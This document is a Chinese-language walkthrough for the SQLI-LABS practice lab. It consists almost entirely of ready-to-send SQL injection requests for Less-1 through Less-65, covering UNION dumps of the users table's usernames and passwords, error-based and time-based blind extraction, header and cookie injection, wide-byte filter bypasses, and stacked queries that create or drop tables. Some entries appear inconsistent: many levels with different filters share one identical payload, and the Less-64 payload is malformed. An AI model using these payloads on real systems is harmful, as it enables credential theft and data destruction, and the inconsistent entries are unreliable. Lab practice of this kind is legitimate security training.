【靶场】SQLI-LABS通关攻略

前言

SQLI-LABS通关攻略

Page-1 (Basic Challenges)

Less-1

request
1
GET /Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+

Less-2

request
1
GET /Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users --+

Less-3

request
1
GET /Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+

Less-4

request
1
GET /Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+

Less-5

request
1
GET /Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+

Less-6

request
1
GET /Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+

Less-7

request
1
GET /Less-7/?id=1')) and ascii(substr((select database()),1,1))=115 --+

Less-8

request
1
GET /Less-8/?id=1' and ascii(substr((select database()),1,1))=115 --+

Less-9

request
1
GET /Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+

Less-10

request
1
GET /Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+

Less-11

request
1
2
3
4
POST /Less-11/
Content-Type: application/x-www-form-urlencoded

uname=' or 1=1 --+&passwd=1&submit=Submit

Less-12

request
1
2
3
4
POST /Less-12/
Content-Type: application/x-www-form-urlencoded

uname=-1") union select (select group_concat(username) from users),(select group_concat(password) from users) --+&passwd=1&submit=Submit

Less-13

request
1
2
3
4
POST /Less-13/
Content-Type: application/x-www-form-urlencoded

uname=admin') and sleep(3) --+&passwd=1&submit=Submit

Less-14

request
1
2
3
4
POST /Less-14/
Content-Type: application/x-www-form-urlencoded

uname=admin" and sleep(3) --+&passwd=1&submit=Submit

Less-15

request
1
2
3
4
POST /Less-15/
Content-Type: application/x-www-form-urlencoded

uname=admin' and if(length(database())=8,sleep(3),1) --+&passwd=1&submit=Submit

Less-16

request
1
2
3
4
POST /Less-16/
Content-Type: application/x-www-form-urlencoded

uname=admin") and if(length(database())=8,sleep(3),1) --+&passwd=1&submit=Submit

Less-17

request
1
2
3
4
POST /Less-17/
Content-Type: application/x-www-form-urlencoded

uname=admin&passwd=1' and updatexml(1,concat(0x7e,database()),1) --+&submit=Submit

Less-18

  • User-Agent 头注入
request
1
2
3
4
5
POST /Less18/
Content-Type: application/x-www-form-urlencoded
User-Agent: 1' or updatexml(1,concat(0x7e,database()),1) or '1

uname=admin&passwd=admin&submit=Submit

Less-19

request
1
2
3
4
5
POST /Less19/
Content-Type: application/x-www-form-urlencoded
Referer: 1' or updatexml(1,concat(0x7e,database()),1) or '1

uname=admin&passwd=admin&submit=Submit

Less-20

request
1
2
GET /Less-20/index.php
Cookie: uname=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+

Page-2 (Advanced Injections)

Less-21

request
1
2
GET /Less-21/index.php
Cookie: uname=LTEnKSB1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpIw%3d%3d

Less-22

request
1
2
GET /Less-22/index.php
Cookie: uname=LTEiIHVuaW9uIHNlbGVjdCAxLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIHVzZXJzKSwoc2VsZWN0IGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSB1c2Vycykj

Less-23

request
1
GET /Less-23/?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),3 or '1'='1

Less-24

  1. 注册admin'#用户
  2. 登录admin'#用户
  3. 修改admin'#用户密码
  4. 退出登录admin'#用户
  5. 登录admin用户,密码为admin'#用户的新密码


Less-25

  • 过滤 or/and 用 && ||
request
1
?id=-1' && 1=2 union select 1,2,3 and '1'='1

Less-25a

  • 过滤空格 or/and
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1

Less-26

  • 过滤空格、注释、or/and
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1

Less-26a

  • 过滤 /*#– 空格
request
1
?id=-1'%0aunion%0aselect%0a1,2,3%0aand%0a'1'='1

Less-27

  • 过滤 union select
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-27a

  • 过滤大小写关键字
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-28

  • 过滤 union select 注释
request
1
?id=-1' uNioN sElEcT 1,2,3 and '1'='1

Less-28a

  • 多层过滤关键字
request
1
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-29

  • 过滤空格,保留引号
request
1
?id=-1'%09union%09select%091,2,3%09and%09'1'='1

Less-30

  • 数字型过滤空格
request
1
?id=-1%09union%09select%091,2,3

Less-31

  • 双引号过滤空格
request
1
?id=-1"%09union%09select%091,2,3%09and%09"1"="1

Less-32

  • 宽字节 GBK %df 绕过 addslashes
request
1
?id=-1%df' union select 1,2,group_concat(username,0x3a,password) from users --+

Less-33

  • 宽字节 mysql_real_escape_string
request
1
?id=-1%df' union select 1,2,3 --+

Less-34

  • 宽字节 POST 注入
request
1
2
uname 参数:
%df' or 1=1 --+

Less-35

  • 数字型无转义宽字节无影响
request
1
?id=-1 union select 1,2,3 --+

Less-36

  • 单引号 mysql_real_escape_string 宽字节
request
1
?id=-1%df' union select 1,2,3 --+

Less-37

  • POST 宽字节注入
request
1
2
uname:
%df' union select 1,2 --+

Page-3 (Stacked Injections)

Less-38

  • 堆叠注入多语句
request
1
?id=1';select group_concat(username,0x3a,password) from users;--+

Less-39

  • 数字型堆叠注入
request
1
?id=1;select group_concat(username,0x3a,password) from users;--+

Less-40

  • ‘) 闭合堆叠注入
request
1
?id=1');select group_concat(username,0x3a,password) from users;--+

Less-41

  • 无过滤数字堆叠
request
1
?id=1;create table hack like users;--+

Less-42

  • “) 堆叠注入
request
1
?id=1");select database();--+

Less-43

  • ‘) 堆叠注入
request
1
?id=1');show tables;--+

Less-44

  • 双引号堆叠
request
1
?id=1");select user();--+

Less-45

  • ‘) 堆叠注入
request
1
?id=1');select group_concat(table_name) from information_schema.tables where table_schema=database();--+

Less-46

  • 数字堆叠无过滤
request
1
?id=1;drop table if exists test;create table test(id int);--+

Less-47

  • 单引号堆叠,过滤注释
request
1
?id=1';select database() and '1'='1

Less-48

  • 过滤# – 堆叠注入
request
1
?id=1';select database() and '1'='1

Less-49

  • 堆叠 + 空格过滤
request
1
?id=1';%09select%09database()%09and%09'1'='1

Less-50

  • 数字堆叠空格过滤
request
1
?id=1;%09select%09database()

Less-51

  • POST 堆叠注入
request
1
2
uname:
admin';select database();--+

Less-52

  • POST 数字堆叠
request
1
2
uname:
1;select group_concat(username,0x3a,password) from users;--+

Less-53

  • POST ‘) 堆叠
request
1
2
uname:
admin');select database();--+

Page-4 (Challenges)

Less-54

  • 随机闭合 + 过滤关键字盲注
request
1
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),1) and '1'='1

Less-55

  • 随机 ‘) 闭合过滤
request
1
?id=1') and if(ascii(substr(database(),1,1))=115,sleep(2),1) and ('1'='1

Less-56

  • 随机 “ 闭合过滤
request
1
?id=1" and if(ascii(substr(database(),1,1))=115,sleep(2),1) and "1"="1

Less-57

  • 随机数字型过滤
request
1
?id=1 and if(ascii(substr(database(),1,1))=115,sleep(2),1)

Less-58

  • 单引号无注释严格过滤
request
1
?id=-1' uNioN sElEcT 1,2,3 and '1'='1

Less-59

  • 双引号无注释过滤
request
1
?id=-1" uNioN sElEcT 1,2,3 and "1"="1

Less-60

  • 数字型无注释过滤
request
1
?id=-1 uNioN sElEcT 1,2,3

Less-61

  • POST 单引号随机过滤盲注
request
1
2
uname:
admin' and if(length(database())=8,sleep(2),1) and '1'='1

Less-62

  • POST ‘) 闭合盲注
request
1
2
uname:
admin') and if(length(database())=8,sleep(2),1) and ('1'='1

Less-63

  • POST “ 闭合盲注
request
1
2
uname:
admin" and if(length(database())=8,sleep(2),1) and "1"="1

Less-64

  • POST 数字盲注
request
1
2
uname:
1 and if(length(database())=8,sleep(2),1

Less-65

  • POST “) 闭合过滤盲注
request
1
2
uname:
admin") and if(length(database())=8,sleep(2),1) and ("1"="1

完成